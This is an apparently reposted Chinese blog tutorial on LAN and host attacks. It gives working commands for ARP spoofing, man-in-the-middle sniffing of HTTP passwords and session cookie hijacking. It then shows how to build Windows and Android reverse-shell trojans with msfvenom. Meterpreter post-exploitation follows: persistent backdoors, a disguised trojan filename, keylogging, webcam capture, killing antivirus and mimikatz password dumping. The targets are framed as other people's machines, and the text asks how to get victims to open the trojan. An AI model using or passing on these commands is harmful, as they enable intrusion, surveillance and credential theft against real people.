Web安全渗透

来源:互联网 发布:关键词优化在哪里 编辑:程序博客网 时间:2024/05/18 17:44

1. 局域网断网攻击

wins下

 ipconfig

查看主机网络IP。

在vmware下

ifconfig

获取当前虚拟机网卡,可能是eth0

fping -asg 172.20.12.254/24 

获取局域网网关中的所有主机,网关为172.20.12.254

arpspoof -i eth0(网卡) -t 192.168.1.10(目标主机的IP) 192.168.1.1(目标主机所在的网关)arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗

这样就可以使得Ip为192.168.1.10,网关为192.168.1.1,无法连网。

原理:流量劫持
正常上网:上网—》网关—》外网
上网—》劫持机的网卡(所有的流量都经过我)—》不转发到外网,导致断网

2. 流量劫持,并转发到外网,这样可查看所有会话,中间人攻击

echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗

工具:arpspoof –>流量欺骗
ctrl + shift + t,新打开一个终端,输入

driftnet -i eth0

可以查看图经过网卡所有的图片信息,这样就能查看 IP192.168.1.10所浏览的图片,但其仍然可以上网。

3. http账号密码获取

首先流量欺骗

echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗

其次,抓包
ctrl + shift + t,新打开一个终端,输入

ettercap -Tq -i eth0

工具:ettercap抓取网络当中传送的数据包,-T代表文本模式,q代表安静模式。

这样就可以捕获到 IP192.168.1.10登陆到的所有http网页下的账号和密码。

4.局域网内Session会话劫持

Session,通俗的讲,浏览器 打开–》关闭这个期间是一个会话。
在同一个局域网当中,登录别人的百度贴吧等。

首先,流量转发,流量欺骗

echo 1 >/proc/sys/net/ipv4/ip_forward #流量转发arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺骗

其次,捕获数据

ctrl + shift + t,新打开一个终端,输入

tcpdump -i eth0 -w test.cap

用来捕获数据。w写入,tcpdump抓去打到本地的数据包。

最后,解析数据

ctrl + shift + t,新打开一个终端,输入

ferret -r test.cap

下面需要设置浏览器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接着进入下一步,模拟受害者登陆
ctrl + shift + t,新打开一个终端,输入

hamster

再接着进入浏览器,输入 127.0.0.1:1234
就可以看到所有的cookies
点击cookies就可以模拟受害者登陆。

工具:用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 进行ARP欺骗tcpdump抓去打到本地的数据包Ferret用来处理抓下来的数据包的Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

整个流程可见

开始arp欺骗命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100捕获数据包命令:tcpdump -i eth0 -w cookie.cap模拟受害者登录受害者在受害机器上就随便刷新一下或者登录一下完毕下面我们开始重点处理抓去的数据包ferret -r cookie.cap自动生成了 hamster.txt记得设置浏览器代理:开启hamster服务打开hamster 浏览器输入http://127.0.0.1:1234

5.生成木门

攻击端:
OS:Kali
IP:192.168.1.104

被害端:
OS:Windows (64位)
IP:192.168.1.10

metaspolit framework
msf利器!
如何生成木门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=55555 -f exe -o muma.exe

LHOST 为虚拟机的IP,LPORT为虚拟机的端口,我们是用虚拟机作为攻击机。
ctrl + shift +t , 重新打开一个端口
输入

msfconsole #控制台use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 虚拟机IPset LPORT 55555 #55555为虚拟机端口exploit

下面开始寻找肉机,只要别人打开这个muma.exe,就会成功找到。

别人必须打开这个 .exe 文件?如何让别人打开?360 直接就能屏蔽?
监听键盘,输入的是汉语,监听输出的是英文,这是以为监听键盘仅仅只是监听键盘的输入字符。

帮助菜单

meterpreter > ? 

转移 meterpreter到其他进程
(转移的目的是为了防止被攻击人查看进程管理器,杀死不明进程,一般转移到屏幕桌面进程explorer.exe,只要屏幕不关闭,metersploit进程就不关闭)

meterpreter > getuid  // 查看当前权限meterpreter > ps  // 列出当前权限

将木马文件test.exe 的进程pid迁移到 PID为2044的explorer的进程

meterpreter > migrate 2044

验证

meterpreter > ps

查看可知,test.exe进程已经没有了。需要注意的是如果存在杀软的话可能会阻止进程注入

安装后门 metsvc
(安装后门的目的是为了进行开机自启动,修改注册表之类的,让木马能长久的存活,一般把木马test.exe 文件 改成qqconfig.exe之类的伪装名,肉机就不敢删除。)

meterpreter > run metsvc

metsvc后门安装成功,接下来是连接
ctrl + shift +t , 重新打开一个端口

msfconsolemsf > use multi/handlermsf exploit(handler) > set payload windows/metsvc_bind_tcpmsf exploit(handler) > show optionsmsf exploit(handler) > set RHOST 192.168.1.10msf exploit(handler) > set LPORT 31337msf exploit(handler) > exploit

其中 RHOST 为肉机的IP, 端口设置为metsvc所创建的端口

查看肉机的系统

meterpreter > sysinfo

获取作为运行服务器的用户

getuid 

尽可能获取尽可能多的特权

getprivs

获得系统管理员权限

getsystem

获取目标主机的图形界面(VNC)

meterpreter > run vnc

查看屏幕

meterpreter > keyscan_start #启动时与如 Word 或浏览器的进程相关联的键盘记录软件meterpreter > keyscan_dump  #键盘记录软件的内容转储meterpreter >keyscan_stop  #停止键盘记录软件

抓去 meterpreter 桌面的屏幕截图

screenshot

控制摄像头

meterpreter > webcam_stream

控制鼠标
uictl -启用用户界面组件的一些控件

meterpreter > uictl disable mouse #鼠标失效meterpreter > uictl enable mouse  #

查看当前进程

ps

重新打开连接

meterpreter > rerun

查看目标主机都采用了那些防护措施,列出帮助菜单,关闭防火墙以及其它我们发现的防护措施:

meterpreter >run getcountermeasuremeterpreter >run getcountermeasuer -hmeterpreter >run getcountermeasuer -d -k

killav脚本来杀死目标主机运行的杀毒软件

meterpreter > run killav

识别被控制的主机是否是一台虚拟机

meterpreter >run  checkvm

在一个meterpreter会话界面中使用cmd shell

meterpreter >shell

获取密码

法国神器mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块。
首先加载mimikatz模块。
由于我的Windows 2008是64位的,所以先要转移到64位进程。

meterpreter > psmeterpreter > migrate 2780

pid 2780 为64位进程 winlogon.exe

meterpreter > load mimikatz

获取密码哈希

meterpreter > msv

获取明文密码

meterpreter > kerberos

参考主页
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html


待学习的网页
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html


6.渗透安卓 Android

生成木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT= 55555 R > test.apk

ctrl + shift + t 打开另外一个终端

msfconsoleuse exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST  虚拟机IPset LPORT 55555exploit

更多细节可查看
http://www.myexception.cn/android/2023190.html

7.继续

0 0
原创粉丝点击